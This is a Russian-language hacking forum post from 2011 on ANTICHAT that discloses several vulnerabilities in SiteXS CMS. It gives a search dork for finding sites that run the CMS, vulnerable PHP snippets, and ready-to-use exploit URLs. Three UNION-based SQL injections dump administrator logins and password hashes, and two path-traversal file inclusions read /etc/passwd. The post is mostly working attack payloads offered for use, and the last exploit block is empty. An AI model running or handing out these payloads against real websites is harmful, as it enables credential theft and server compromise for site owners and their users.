ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.08.2011, 13:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
SiteXS CMS [SQL-inj && XSS && PHP-inc]
++++++++++++
...this is the beginning, of progressive attack... (c) The Theme, Brooklyn Bounce
++++++++++++
dork: "is powered by SiteXS CMS"
1::SQL-inj::[GET]
users.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
global[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$HTTP_POST_VARS[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from users where id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/modules/member.php?id=-666+UNION+SELECT+1,group_concat(login,0x3a,pass+SEPARATOR+0x3c62723e),3,4,5,6,7+FROM+users+WHERE+admin=1+--
2::SQL-inj::[GET]
subscribe.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"mid"[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from subs_messages where id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mid[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/lib/message.php?mid=-666+UNION+SELECT+1,2,3,group_concat(login,0x3a,pass+SEPARATOR+0x3c62723e),5,6,7,8,9+FROM+users+WHERE+admin=1+--
3::SQL-inj::[GET]
sitemap.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"did"[/COLOR][COLOR="#007700"]];
...
function[/COLOR][COLOR="#0000BB"]_sel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$menu[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
...
[/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_sel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$url1[/COLOR][COLOR="#007700"]);
...
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select id, title, url from chapters where (pid=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]and url<>'searchresult' and url<>'sitemap' and type<>4 and id<>1)[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#DD0000"]order by sortorder"[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/lib/map.php?did=-666+UNION+SELECT+group_concat(login,0x3a,pass+SEPARATOR+0x3c62723e),2,3+FROM+users+WHERE+admin=1+--
4:HP-inc
export.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$HTTP_GET_VARS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"pg"[/COLOR][COLOR="#007700"]];
...
include[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$root[/COLOR][COLOR="#DD0000"]/lib/[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];
...
foreach ([/COLOR][COLOR="#0000BB"]$lines[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"|||"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'(\d{1,2})\.(\d{1,2})\.(\d{1,4}) (\d{1,2}):(\d{1,2}):(\d{1,2})'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]mktime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"||||||||n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$hc[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cleanup[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]));
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"||||||||n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select id from news where matID=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"insert into news set time='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]', title='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]', text='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]', matID='[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"];
...[/COLOR][/COLOR]
exploit:
Код:
Code:
http://temp/lib/export.php?pg=../../../../../../etc/passwd%00
5:HP-inc
post.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]_POST[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
exploit:
Код:
Code:
by POST method!
http://temp/post.php?type=../../../../../../../etc/passwd%00
6::SQL-inj::[POST]
adm.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"pass"[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=new[/COLOR][COLOR="#0000BB"]sql[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]connect[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select id, pass from users where login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид